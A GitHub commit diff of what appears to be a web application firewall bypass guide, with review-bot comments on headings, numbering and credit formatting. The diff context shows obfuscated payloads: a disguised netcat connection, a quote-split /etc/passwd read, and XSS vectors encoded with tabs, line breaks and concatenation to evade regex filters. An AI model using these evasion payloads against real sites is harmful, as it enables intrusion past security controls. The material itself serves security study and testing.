Small perky update to stuff

Infected Drake 2019-06-03 13:18:59 +05:30 committed by GitHub
parent d8e1ddffa5
commit f111d0479c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23


@ -2349,7 +2349,7 @@ __Standard__: `/bin/nc 127.0.0.1 1337`
__Obfuscated__: `/???/n? 2130706433 1337` __Obfuscated__: `/???/n? 2130706433 1337`
Used chars: `/ ? n [0-9]` Used chars: `/ ? n [0-9]`
__9. String Concatenation__ __9. Dynamic Payload Generation__
- Different programming languages have different syntaxes and patterns for concatenation. - Different programming languages have different syntaxes and patterns for concatenation.
- This allows us to effectively generate payloads that can bypass many filters and rules. - This allows us to effectively generate payloads that can bypass many filters and rules.
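Review bot: The new heading `__9. Dynamic Payload Generation__` no longer matches the two bullets under it, which still describe only concatenation syntax across programming languages. Either keep a title that names concatenation, or reword the first bullet so it says what "dynamic payload generation" covers beyond concatenation.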
@ -2363,7 +2363,7 @@ __Obfuscated__: `/bi'n'''/c''at' /e'tc'/pa''ss'wd`
__Standard__: `<iframe/onload='this["src"]="javascript:alert()"';>` __Standard__: `<iframe/onload='this["src"]="javascript:alert()"';>`
__Obfuscated__: `<iframe/onload='this["src"]="jav"+"as&Tab;cr"+"ipt:al"+"er"+"t()"';>` __Obfuscated__: `<iframe/onload='this["src"]="jav"+"as&Tab;cr"+"ipt:al"+"er"+"t()"';>`
__9. Junk Chars__ __9. Junk Characters__
- Normal payloads get filtered out easily. - Normal payloads get filtered out easily.
- Adding some junk chars helps avoid detection (specific cases only). - Adding some junk chars helps avoid detection (specific cases only).
- They often help in confusing regex based firewalls. - They often help in confusing regex based firewalls.
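Review bot: The renamed heading `__9. Junk Characters__` keeps the number 9, which `__9. Dynamic Payload Generation__` in the previous hunk already uses, while the next section is `__10. Line Breaks__`. Since this line is being edited anyway, renumber it and the sections that follow, and change "junk chars" in the second bullet to "junk characters" so the body matches the new title.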
@ -2382,8 +2382,8 @@ __10. Line Breaks__
- Many WAF with regex based filtering effectively blocks many attempts. - Many WAF with regex based filtering effectively blocks many attempts.
- Line breaks (CR/LF) can break firewall regex and bypass stuff. - Line breaks (CR/LF) can break firewall regex and bypass stuff.
__Standard__: `<iframe src=javascript:alert(0)">` __Standard__: `<iframe src=javascript:confirm(0)">`
__Obfuscated__: `<iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)">` __Obfuscated__: `<iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(0)">`
__11. Uninitialized Variables__ __11. Uninitialized Variables__
- Uninitialized bash variables can evade bad regular expression based filters and pattern match. - Uninitialized bash variables can evade bad regular expression based filters and pattern match.
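Review bot: Both example lines switch from `alert(0)` to `confirm(0)` with no reason given in the commit message, while the iframe examples in the neighbouring hunks still use `alert()` and `alert(1)`; pick one convention for the whole document or state why this section differs. The Standard line also carries over a closing `"` after `(0)` with no opening quote on `src=`, which is worth correcting while the line is being touched.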
@ -2420,7 +2420,7 @@ __Variant__: `<IMG SRC=" jav ascri pt:alert ();">`
__Standard__: `<iframe src=javascript:alert(1)></iframe>` __Standard__: `<iframe src=javascript:alert(1)></iframe>`
__Obfuscated__: __Obfuscated__:
``` ```
<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
``` ```
__13. Obfuscation in Other Formats__ __13. Obfuscation in Other Formats__
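Review bot: No textual difference is visible between the old and new side of this hunk; the `__Standard__` line, the fenced `<iframe src=j&Tab;a...` line and the section 13 heading read the same on both sides. If this is a whitespace or line-ending change, say so in the commit message or drop it from this commit so the diff carries only the intended wording edits.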
@ -2694,7 +2694,7 @@ GET /cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&co
Host: favoritewaf.com Host: favoritewaf.com
User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT) User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
``` ```
- XSS Bypass by [0xInfection](https://twitter.com/0xInfection) - XSS Bypass by [@0xInfection](https://twitter.com/0xInfection)
``` ```
<a href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:open()>clickhere <a href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:open()>clickhere
``` ```
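Review bot: The credit line changes the link text from `[0xInfection]` to `[@0xInfection]`; apply the same `@handle` form to every other attribution in this list in the same commit so credits do not end up in two styles. The commit message "Small perky update to stuff" should also name the actual edits (heading renames, example changes, credit format) so the history is searchable.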